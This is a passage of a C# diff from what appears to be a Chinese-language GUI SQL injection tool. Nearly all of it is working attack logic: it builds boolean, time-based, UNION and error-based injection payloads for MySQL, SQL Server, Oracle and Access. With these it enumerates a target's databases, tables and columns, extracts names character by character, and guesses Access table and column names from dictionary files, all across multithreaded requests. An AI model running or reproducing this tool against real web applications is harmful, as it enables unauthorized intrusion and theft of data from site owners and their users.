db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByUnionByOracle), j);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ }
+
+ }
+ public void getDBSByBool(DBType dbType)
+ {
+ int db_len = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ MessageBox.Show("Access数据库没有库!");
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ //获取数据库数量
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ db_len = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.dbs_count, config.maxTime), 0, 10);
+ }
+ else
+ {
+ db_len = getValueByStepUp(MySQL5.bool_db_count, 0, 10);
+ }
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!");
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 0; j < db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByBoolByMySQL), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.SQLServer:
+ db_len = getValueByStepUp(MSSQL.bool_db_count, 0, 10);
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!");
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByBoolBySQLServer), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.Oracle:
+ db_len = getValueByStepUp(Oracle.bool_db_count, 0, 10);
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!");
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ //db下标从1开始
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByBoolByOracle), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ }
+ }
+
+ public void checkTableIsExis(object osn)
+ {
+ SelectNode sn = (SelectNode)osn;
+
String payload = String.Format(Comm.exists_table, sn.tableName);
+ bool findKey = findKeyInBody(payload);
+ if (findKey)
+ {
+ this.Invoke(new showLogDelegate(log), "发现表:" + sn.tableName);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, sn.tableName, "table");
+ }
+
+ }
+
+ public void checkColumnIsExis(object osn)
+ {
+ SelectNode sn = (SelectNode)osn;
+ String payload = String.Format(Comm.exists_column, sn.columnName, sn.tableName);
+ bool findKey = findKeyInBody(payload);
+ if (findKey)
+ {
+ this.Invoke(new showLogDelegate(log), "表" + sn.tableName + "发现列:" + sn.columnName);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, sn.columnName, "column");
+ }
+
+ }
+
+
+ public void checkTablesDic(TreeNode tn)
+ {
+
+ //加载字典
+ List dirs = FileTool.readAllDic("config/tables/");
+ foreach (String fpath in dirs)
+ {
+ if (status != 1) break;
+ this.Invoke(new StringDelegate(log), "正在使用字典" + fpath + "进行盲猜!");
+ List tables = FileTool.readFileToList("config/tables/" + fpath);
+ comm_count = tables.Count;
+ for (int i = 0; i < tables.Count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tableName = tables[i];
+ sn.tn = tn;
+ MyThreadPool.initThread(new ParameterizedThreadStart(checkTableIsExis), sn);
+ comm_currentCount = i + 1;
+ }
+ }
+
+ }
+
+ public void checkColumnsDic(TreeNode tn)
+ {
+
+ //加载字典
+ List dirs = FileTool.readAllDic("config/columns/");
+ foreach (String fpath in dirs)
+ {
+ if (status != 1) break;
+ this.Invoke(new StringDelegate(log), "正在使用字典" + fpath + "进行盲猜!");
+ List columns = FileTool.readFileToList("config/columns/" + fpath);
+ comm_count = columns.Count;
+ for (int i = 0; i < columns.Count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.columnName = columns[i];
+ sn.tableName = tn.Text;
+ sn.tn = tn;
+ MyThreadPool.initThread(new ParameterizedThreadStart(checkColumnIsExis), sn);
+ comm_currentCount = i + 1;
+ }
+ }
+
+ }
+
+ ///
+ /// bool方式获取表明
+ ///
+ /// 数据库节点
+ public void
getTabeleNameByBool(DBType dbType, TreeNode tn)
+ {
+ //获取当前数据库长度
+ String dbname = tn.Text;
+ int table_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ if (String.IsNullOrEmpty(config.key))
+ {
+ MessageBox.Show(ErrorMessage.access_no_key);
+ return;
+ }
+ checkTablesDic(tn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ //获取当前数据库长度
+
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ table_count = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), config.maxTime), 0, 50);
+ }
+ else
+ {
+ table_count = getValueByStepUp(MySQL5.bool_tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), 0, 50);
+ }
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbname + "发现" + table_count + "个表!");
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbname;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByBoolByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ table_count = getValueByStepUp(MSSQL.bool_tables_count.Replace("{dbname}", dbname), 0, 50);
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbname + "发现" + table_count + "个表!");
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbname;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByBoolBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ //获取当前数据库长度
+ table_count = getValueByStepUp(Oracle.bool_tables_count.Replace("{dbname}", dbname), 0, 50);
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbname + "发现" + table_count + "个表!");
+ for (int i = 1; i <= table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbname;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByBoolByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ ///
+ /// union方式获取表名
+ ///
+ public void getTabeleNameByUnion(DBType dbType, TreeNode tn)
+ {
+ String dbName = tn.Text;
+ List data_list = new List();
+ String tables_count_payload = "";
+ String result = "";
+ int table_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ if (String.IsNullOrEmpty(config.key))
+ {
+ MessageBox.Show(ErrorMessage.access_no_key);
+ return;
+ }
+ checkTablesDic(tn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ //获取当前数据库表数量
+ data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")));
+ tables_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByUnionByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ //获取当前数据库表数量
+ tables_count_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.tables_count, dbName, "", "");
+ result = getOneDataByUnionOrError(tables_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByUnionBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ //获取当前数据库表数量
+ tables_count_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn,
Oracle.tables_count, dbName, "", "");
+ result = getOneDataByUnionOrError(tables_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,用户" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ //下标1开始
+ for (int i = 1; i <= table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByUnionByOracle), sn);
+ }
+ break;
+ }
+ }
+
+ ///
+ /// Error方式获取
+ ///
+ public void getTabeleNameByError(DBType dbType, TreeNode tn)
+ {
+ //获取数据库数量
+ String dbName = tn.Text;
+ List data_list = new List();
+ String tables_count_payload = "";
+ String result = "";
+ int table_count = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ MessageBox.Show("抱歉Access数据库不支持错误显示注入!");
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL5:
+ //获取当前数据库表长度
+ data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")));
+ tables_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", tables_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByErrorByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ //获取当前数据库表长度
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.tables_count.Replace("{dbname}", dbName)));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" +
Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 0; i < table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByErrorBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ //获取当前数据库表长度
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.tables_count, dbName, "", ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!");
+ table_count = Tools.convertToInt(result);
+ this.tableCount = table_count;
+ for (int i = 1; i <= table_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = tn;
+ sn.limit = i;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getTableNameValueByErrorByOracle), sn);
+ }
+ break;
+ }
+ }
+
+ ///
+ /// 获取数据库列表
+ ///
+ public void getDBS()
+ {
+
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getDBSByBool(config.dbType);
+ break;
+
+ case InjectType.Union:
+ getDBSByUnion(config.dbType);
+ break;
+ case InjectType.Error:
+ getDBSByError(config.dbType);
+ break;
+ case InjectType.Sleep:
+ getDBSByBool(config.dbType);
+ break;
+
+ }
+ }
+ private void data_dbs_tsl_getDBS_Click(object sender, EventArgs e)
+ {
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ //获取环境变量
+ this.data_tvw_dbs.Nodes.Clear();
+ if (this.cbox_basic_dbType.Text.Equals("Access"))
+ {
+ addDBToTreeList("Access");
+ }
+ //检查注入配置
+ if (checkConfig())
+ {
+ //判断是否标记注入点
+ if (isSetInjectPoint())
+ {
+ status = 1;
+ this.currentThread = new Thread(getDBS);
+ this.currentThread.Start();
+ }
+
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("还有线程未结束,请稍后....");
+
+ }
+
+ }
+
+ ///
+ /// 获取当前数据库下的表
+ ///
+ /// 当前数据库的TreeNode节点
+ public void getTables(Object otn)
+ {
+ if (checkConfig())
+ {
+ if (isSetInjectPoint())
+ {
+ switch (config.injectType)
+ {
+ case
InjectType.Bool:
+ getTabeleNameByBool(config.dbType, (TreeNode)otn);
+ break;
+ case InjectType.Union:
+ getTabeleNameByUnion(config.dbType, (TreeNode)otn);
+ break;
+ case InjectType.Error:
+ getTabeleNameByError(config.dbType, (TreeNode)otn);
+ break;
+ case InjectType.Sleep:
+ getDBSByBool(config.dbType);
+ break;
+ }
+ }
+ else
+ {
+ MessageBox.Show("请标记注入点!");
+ }
+ }
+ else
+ {
+ MessageBox.Show("配置不完整,请检注入查配置!");
+ }
+ }
+
+ private void data_dbs_tsl_getTables_Click(object sender, EventArgs e)
+ {
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ if (tn.Checked && "dbs".Equals(tn.Tag))
+ {
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ tn.Nodes.Clear();
+ status = 1;
+ this.currentThread = new Thread(new ParameterizedThreadStart(getTables));
+ this.currentThread.Start(tn);
+ }
+ else
+ {
+ MessageBox.Show("还有线程未结束,请稍后....");
+ }
+ }
+ }
+ }
+
+ ///
+ /// 获取列明称,bool方式
+ ///
+ /// 表的节点
+ public void getColumnNameByBoolByMySQL(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //判断当前表长度
+ String data_payload = MySQL5.column_value.Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")).Replace("{index}", sn.limit + "").Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8"));
+ int len = 0;
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50);
+ }
+ else
+ {
+
+ len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50);
+ }
+
+ //判断当前数据库对应的ascii码
+ String va_payload = MySQL5.ver_value.Replace("{data}", data_payload);
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", data_payload), config.maxTime);
+ }
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value +=
((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "表" + sn.tableName + "发现列:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "column");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取列名称,bool方式
+ ///
+ /// 表的节点
+ public void getColumnNameByBoolBySQLServer(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ String data_payload = MSSQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("{dbname}", sn.dbname).Replace("{table}", sn.tableName);
+ int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ if (Tools.convertToInt(unicodes.ToString()) > 255)
+ {
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ }
+ else
+ {
+ value += (char)Tools.convertToInt(unicodes.ToString());
+ }
+ }
+ this.Invoke(new StringDelegate(log), "表" + sn.tableName + "发现列:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "column");
+
+ }
+ catch (Exception e)
+ {
+
+
this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取列明称,bool方式
+ ///
+ /// 表的节点
+ public void getColumnNameByBoolByOracle(Object osn)
+ {
+
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //判断当前表长度
+ String data_payload = Oracle.column_value.Replace("{table}", sn.tableName).Replace("{index}", sn.limit + "").Replace("{dbname}", sn.dbname);
+ int len = getValue(Oracle.bool_length.Replace("{data}", data_payload), 1, 50);
+
+ //判断当前数据库对应的ascii码
+ String va_payload = Oracle.bool_value.Replace("{data}", data_payload);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), "表" + sn.tableName + "发现列:" + value);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "column");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取列名,union MySQL
+ ///
+ ///
+ public void getColumnNameByUnionByMySQL(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //获取数据库数量
+ List data_list = new List();
+ data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")));
+ String column_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", column_Name_data));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取列名,union MySQL
+ ///
+ ///
+ public
void getColumnNameByUnionBySQLServer(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+
+ String column_Name_data = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.column_value, sn.dbname, sn.tableName, sn.limit.ToString());
+ String result = getOneDataByUnionOrError(column_Name_data);
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取列名,union oracle
+ ///
+ ///
+ public void getColumnNameByUnionByOracle(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+
+ String column_Name_data = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.column_value, sn.dbname, sn.tableName, sn.limit.ToString());
+ String result = getOneDataByUnionOrError(column_Name_data);
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取列名时发生异常:" + e.Message);
+ }
+ }
+
+
+ public void getColumnNameByErrorByMySQL(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ //获取数据库数量
+ List data_list = new List();
+ data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")));
+ String column_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", column_Name_data));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+
}
+
+ public void getColumnNameByErrorBySQLServer(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("{dbname}", sn.dbname).Replace("{table}", sn.tableName)));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ public void getColumnNameByErrorByOracle(Object osn)
+ {
+ try
+ {
+ SelectNode sn = (SelectNode)osn;
+ String result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.column_value, sn.dbname, sn.tableName, sn.limit.ToString()));
+ this.Invoke(new StringDelegate(log), "发现列:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取表下面的列
+ ///
+ /// 数据库类型
+ public void getColumnsByBool(DBType dbType)
+ {
+
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+ if (ctn.Checked && "table".Equals(ctn.Tag))
+ {
+ ctn.Nodes.Clear();
+
+ String dbName = ctn.Parent.Text;
+ String tableName = ctn.Text;
+ int columns_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ checkColumnsDic(ctn);
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+
+ if (KeyType.Time.Equals(config.keyType))
+ {
+ columns_count = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), config.maxTime), 0, 20);
+ }
+ else
+ {
+ columns_count = getValueByStepUp(MySQL5.bool_columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", 
Tools.strToHex(tableName, "UTF-8")), 0, 20);
+ }
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!");
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByBoolByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ columns_count = getValueByStepUp(MSSQL.bool_columns_count.Replace("{dbname}", dbName).Replace("{table}", tableName), 0, 20);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!");
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByBoolBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ columns_count = getValueByStepUp(Oracle.bool_columns_count.Replace("{dbname}", dbName).Replace("{table}", tableName), 0, 20);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!");
+ for (int i = 1; i <= columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByBoolByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ }
+ }
+
+ }
+
+ ///
+ /// 获取表下面的列
+ ///
+ /// 数据库类型
+ public void getColumnsByUnion(DBType dbType)
+ {
+
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+ if (ctn.Checked && "table".Equals(ctn.Tag))
+ {
+ ctn.Nodes.Clear();
+ String dbName = ctn.Parent.Text;
+ String tableName = ctn.Text;
+ List data_list = new List();
+ String columns_count_payload = "";
+ String result = "";
+ int columns_count = 0;
+ switch (dbType)
+ {
+
+ case DBType.Access:
+ checkColumnsDic(ctn);
+ break;
+ case DBType.MySQL4: 
+
+ break;
+ case DBType.MySQL5:
+ data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")));
+ columns_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", columns_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByUnionByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ columns_count_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.columns_count, dbName, tableName, "");
+ result = getOneDataByUnionOrError(columns_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByUnionBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ columns_count_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.columns_count, dbName, tableName, "");
+ result = getOneDataByUnionOrError(columns_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 1; i <= columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+
sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByUnionByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ }
+ }
+
+ }
+
+
+ ///
+ /// 获取表下面的列
+ ///
+ /// 数据库类型
+ public void getColumnsByError(DBType dbType)
+ {
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+ if (ctn.Checked && "table".Equals(ctn.Tag))
+ {
+ ctn.Nodes.Clear();
+ String dbName = ctn.Parent.Text;
+ String tableName = ctn.Text;
+ List data_list = new List();
+ String columns_count_payload = "";
+ String result = "";
+ int columns_count = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ MessageBox.Show("抱歉Access数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL5:
+
